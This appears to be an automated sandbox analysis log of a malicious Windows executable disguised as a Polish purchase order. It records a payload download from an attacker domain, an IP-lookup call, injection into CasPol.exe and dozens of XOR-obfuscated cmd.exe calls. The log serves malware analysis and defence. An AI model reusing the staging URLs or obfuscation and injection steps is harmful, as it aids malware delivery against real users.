            Source: Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe, 00000001.00000003.13041218149.0000000002932000.00000004.00000020.00020000.00000000.sdmp, default.css.1.drString found in binary or memory: http://mozilla.org/MPL/2.0/.
            Source: Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
            Source: Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: CasPol.exe, 00000089.00000002.18044285630.0000000034141000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: CasPol.exe, 00000089.00000002.18044285630.00000000341E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sentientshift.com
            Source: Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe, 00000001.00000003.13041218149.0000000002932000.00000004.00000020.00020000.00000000.sdmp, default.css.1.drString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: CasPol.exe, 00000089.00000002.18044285630.0000000034141000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
            Source: CasPol.exe, 00000089.00000002.18044285630.0000000034141000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
            Source: CasPol.exe, 00000089.00000002.18026950300.00000000037C8000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000089.00000002.18026950300.000000000378B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://enlluec.tk/
            Source: CasPol.exe, 00000089.00000002.18026950300.00000000037C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://enlluec.tk/dkVAJHULLLAJIKvMzyyDm233.pcx
            Source: unknownDNS traffic detected: queries for: enlluec.tk
            Source: global trafficHTTP traffic detected: GET /dkVAJHULLLAJIKvMzyyDm233.pcx HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: enlluec.tkCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 103.83.194.19:443 -> 192.168.11.20:49854 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 64.185.227.155:443 -> 192.168.11.20:49855 version: TLS 1.2
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeCode function: 1_2_00405050 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageA,CreatePopupMenu,LdrInitializeThunk,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,LdrInitializeThunk,SetClipboardData,CloseClipboard,
            Source: Conhost.exeProcess created: 100
            Source: Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeCode function: 1_2_004030D9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: C:\Windows\resources\0409Jump to behavior
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeCode function: 1_2_00406344
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeCode function: 1_2_0040488F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 137_2_00B113D0
            Source: Microsoft.Practices.Composite.UnityExtensions.dll.1.drStatic PE information: No import functions for PE file found
            Source: Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe, 00000001.00000003.13038087262.0000000002936000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Practices.Composite.UnityExtensions.dll\ vs Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeSection loaded: edgegdi.dll
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeSection loaded: havegangenes.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: edgegdi.dll
            Source: Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeStatic PE information: invalid certificate
            Source: Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeVirustotal: Detection: 32%
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile read: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeJump to behavior
            Source: Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknownProcess created: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x0E^75"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x19^75"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x05^75"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x0E^75"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x07^75"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x78^75"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x79^75"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x71^75"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x71^75"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x08^75"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x39^75"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x2E^75"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x2A^75"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x3F^75"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x2E^75"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x0D^75"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x22^75"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x27^75"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x2E^75"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x0A^75"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x63^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x26^75"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x39^75"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7F^75"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x67^75"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x22^75"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x33^75"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x73^75"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x67^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x22^75"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x67^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x3B^75"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x67^75"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x22^75"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x22^75"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x33^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x73^75"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x67^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x0E^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x19^75"
